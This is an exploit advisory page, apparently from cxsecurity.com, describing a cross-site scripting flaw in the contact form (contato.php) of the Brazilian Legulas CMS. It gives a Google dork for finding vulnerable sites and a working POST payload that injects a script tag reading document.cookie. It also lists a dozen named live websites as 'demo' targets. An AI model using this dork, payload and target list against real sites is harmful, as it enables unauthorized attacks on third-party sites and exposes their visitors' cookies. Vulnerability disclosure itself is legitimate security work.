Legulas CMS Cross Site Scripting

2016.04.29
Credit: Ashiyane Digital Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: intext:"Desenvolvido por Légulas 2013"

###################### # Exploit Title : Legulas CMS Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.legulas.com.br/ # Google Dork : intext:"Desenvolvido por Légulas 2013" # Date: 29 Apr 2016 # Tested On : Kali # Contact:n3t.hacker@gmail.com ###################### # Vulnerable File : contato.php # Request Method: POST # Payload : assunto=1&email=n3t.hacker@gmail.com&mensagem=20&nome=ndnvhdaj'%22()%26%25<acx><ScRiPt%20>alert(document.cookie)</ScRiPt>&telefone=555-666-0606 # Describe : Search dork and select Target. Put /contato.php After url such as : # http://site.com/contato.php # Send data with post method ... Ok # # Demo : # http://www.jeepclubedecuritiba.com.br/contato.php # http://www.prbinstalacoes.com.br/contato.php # http://www.dumesquita.com.br/contato.php # http://www.attos.ind.br/contato.php # http://www.aquarioemacrilico.com.br/contato.php # http://casadaazeitona.com.br/contato.php # http://www.almeidamateriais.com.br/contato.php # http://www.domakoskicarnes.com.br/contato.php # http://metalurgica3g.com.br/contato.php # http://www.grespcred.com.br/contato.php # http://www.unisat-br.com.br/contato.php # http://www.streakwave.com.br/contato.php # # ###################### # discovered by : Net Hacker ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top